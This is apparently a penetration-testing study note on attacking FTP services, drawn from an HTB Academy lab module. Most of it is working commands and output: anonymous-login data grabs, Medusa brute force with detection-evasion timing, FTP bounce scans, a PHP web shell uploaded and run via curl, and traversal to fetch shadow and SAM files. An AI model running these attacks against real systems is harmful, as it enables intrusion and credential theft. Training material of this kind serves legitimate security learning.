πFTP Attacks
π― Overview
This document covers exploitation techniques against FTP services, focusing on practical attack methodologies from HTB Academy's "Attacking Common Services" module. Unlike enumeration, these techniques aim to gain unauthorized access, escalate privileges, or exploit misconfigurations.
"The File Transfer Protocol (FTP) is a standard network protocol used to transfer files between computers. We can abuse misconfigurations or excessive privileges, exploit known vulnerabilities or discover new vulnerabilities."
ποΈ FTP Attack Methodology
Attack Chain Overview
Service Discovery β Misconfiguration Analysis β Authentication Attacks β File System Exploitation β Privilege EscalationKey Attack Objectives
Unauthorized file access through anonymous authentication
Credential compromise via brute force attacks
Network pivoting using FTP bounce attacks
Remote code execution through file upload capabilities
Information disclosure via configuration analysis
β οΈ Misconfiguration Exploitation
Anonymous Access Abuse
Anonymous Authentication Attack
# Test anonymous access
ftp target_ip
# Username: anonymous
# Password: anonymous (or any email address)
# HTB Academy example session:
$ ftp 192.168.2.142
Connected to 192.168.2.142.
220 (vsFTPd 2.3.4)
Name (192.168.2.142:user): anonymous
331 Please specify the password.
Password: anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>Mass Data Extraction
# Automated download of accessible files
wget -m --no-passive ftp://anonymous:anonymous@target_ip
# Results in organized directory structure
tree target_ip/
βββ target_ip
βββ sensitive_documents/
β βββ passwords.txt
β βββ database_config.ini
β βββ employee_list.xlsx
βββ backup_files/
βββ system_backup.tar.gzπ Authentication Attacks
Brute Force with Medusa
Basic Medusa Usage
# Single user brute force
medusa -u admin -P /usr/share/wordlists/rockyou.txt -h target_ip -M ftp
# HTB Academy example:
medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp
# Expected output:
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ftp] Host: 10.129.203.7 (1 of 1, 0 complete) User: fiona (1 of 1, 0 complete) Password: 123456 (1 of 14344392 complete)
ACCOUNT FOUND: [ftp] Host: 10.129.203.7 User: fiona Password: family [SUCCESS]Advanced Medusa Attacks
# Multi-user brute force
medusa -U userlist.txt -P passwords.txt -h target_ip -M ftp
# Targeted attack with common passwords
medusa -u admin -p admin,password,123456,ftp,root -h target_ip -M ftp
# Slow brute force to avoid detection
medusa -u admin -P passwords.txt -h target_ip -M ftp -t 1 -s 5π FTP Bounce Attack Exploitation
HTB Academy FTP Bounce Implementation
# Nmap FTP bounce scan
nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2
# Expected output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:password@10.10.110.213:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.
PORT STATE SERVICE
80/tcp open httpManual FTP Bounce Attack
# Connect to FTP server
ftp vulnerable_ftp_server
# Use PORT command to target internal host
ftp> port 192,168,1,100,0,22 # Target 192.168.1.100:22
200 PORT command successful.
# Trigger connection with LIST
ftp> list
150 Here comes the directory listing.
# Connection attempt made to targetποΈ File System Exploitation
Web Shell Upload Attack
# Create PHP web shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Upload to web-accessible directory
ftp> cd /var/www/html
ftp> put shell.php
ftp> quit
# Execute commands
curl "http://target_ip/shell.php?cmd=whoami"Directory Traversal Attacks
# Test directory traversal
ftp> cd ../../../etc
ftp> get passwd
ftp> get shadow
# Windows traversal
ftp> cd ..\..\..\Windows\System32
ftp> get SAMπ FTP Attack Checklist
Authentication Attacks
Exploitation Attacks
Post-Exploitation
π― HTB Academy Lab Scenarios
Scenario 1: Anonymous Access Exploitation
# Target has anonymous FTP with write access to web directory
ftp target_ip
# Username: anonymous, Password: anonymous
# Upload web shell to web-accessible directory
ftp> cd htdocs
ftp> put shell.php
ftp> quit
# Achieve remote code execution
curl "http://target_ip/shell.php?cmd=whoami"Scenario 2: Brute Force with Medusa
# Discovered username through enumeration: fiona
medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h target_ip -M ftp
# Result: fiona:family
# Access FTP and extract sensitive filesScenario 3: FTP Bounce Attack
# Use FTP server to scan internal network
nmap -Pn -v -n -p80 -b anonymous:password@ftp_server internal_target
# Discover internal services through FTP proxyπ‘ Key Attack Insights
Attack Effectiveness Factors
Anonymous access - Immediate exploitation opportunity
Write permissions - Enable file upload attacks
Web directory access - Direct path to code execution
Weak credentials - Entry point for authorized access
Internal network position - Pivot for lateral movement
Common Attack Patterns
Reconnaissance β Anonymous testing β File extraction
Brute force β Credential discovery β Privilege abuse
Bounce attack β Internal scanning β Lateral movement
File upload β Web shell β Remote code execution
Configuration abuse β Persistence β Privilege escalation
This document provides comprehensive FTP attack methodologies based on HTB Academy's "Attacking Common Services" module, focusing on practical exploitation techniques for penetration testing and security assessment.
Last updated